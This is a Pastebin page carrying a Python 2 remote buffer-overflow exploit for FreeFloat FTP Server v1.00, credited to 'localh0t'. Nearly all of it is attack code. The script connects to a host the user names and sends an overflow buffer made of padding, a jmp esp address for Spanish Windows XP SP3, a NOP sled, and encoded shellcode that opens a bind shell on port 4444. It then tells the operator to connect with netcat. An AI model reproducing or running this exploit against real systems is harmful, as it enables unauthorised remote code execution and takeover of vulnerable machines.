API tools faq
paste
Guest User

FreeFloat FTP Server v1.00 Remote Buffer Overflow Exploit

a guest
Jul 28th, 2011
363
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.72 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2.  
  3. # FreeFloat FTP Server v1.00 Remote Buffer Overflow Exploit (No FTP Command Needed)
  4. # written by localh0t
  5. # Date: 29/07/11
  6. # Contact: mattdch0@gmail.com
  7. # Follow: @mattdch
  8. # www.localh0t.com.ar | www.mfsec.com.ar
  9. # Thanks to: Pr0zac, Irakirashia, Kchito
  10. # Targets: Windows XP SP3 Spanish (No DEP) (Change as you wish)
  11. # Shellcode: List shell on port 4444 (Change as you wish)
  12.  
  13. from socket import *
  14. import sys, struct, os
  15.  
  16. if (len(sys.argv) < 3):
  17.     print "\nFreeFloat FTP Server v1.00 Remote Buffer Overflow Exploit"
  18.         print "\n   Usage: %s <host> <port> \n" %(sys.argv[0])
  19.     sys.exit()
  20.  
  21. print "\n[!] Connecting to %s" %(sys.argv[1])
  22. # connect to host
  23. sock = socket(AF_INET,SOCK_STREAM)
  24. sock.connect((sys.argv[1],int(sys.argv[2])))
  25. sock.recv(1024)
  26.  
  27. # padding
  28. buffer = "A" * 251
  29.  
  30. # jmp esp (shell32.dll Windows XP SP3 Spanish)
  31. buffer += "\x4f\x31\x6b\x7e"
  32.  
  33. # NOPsled
  34. buffer += "\x90" * 20
  35.  
  36. # shellcode
  37. buffer += ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"+
  38. "\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"+
  39. "\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"+
  40. "\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"+
  41. "\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"+
  42. "\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"+
  43. "\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"+
  44. "\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"+
  45. "\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"+
  46. "\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"+
  47. "\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"+
  48. "\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"+
  49. "\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"+
  50. "\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"+
  51. "\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"+
  52. "\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"+
  53. "\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"+
  54. "\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"+
  55. "\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"+
  56. "\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"+
  57. "\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"+
  58. "\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"+
  59. "\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"+
  60. "\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"+
  61. "\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
  62.  
  63. # end connection
  64. buffer += "\x0a"
  65.  
  66. # send buffer
  67. print "[!] Sending exploit..."
  68. sock.send(buffer)
  69. sock.recv(1024)
  70. sock.close()
  71. print "[!] Exploit succeed. Now netcat %s on port 4444\n" %(sys.argv[1])
  72. sys.exit()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!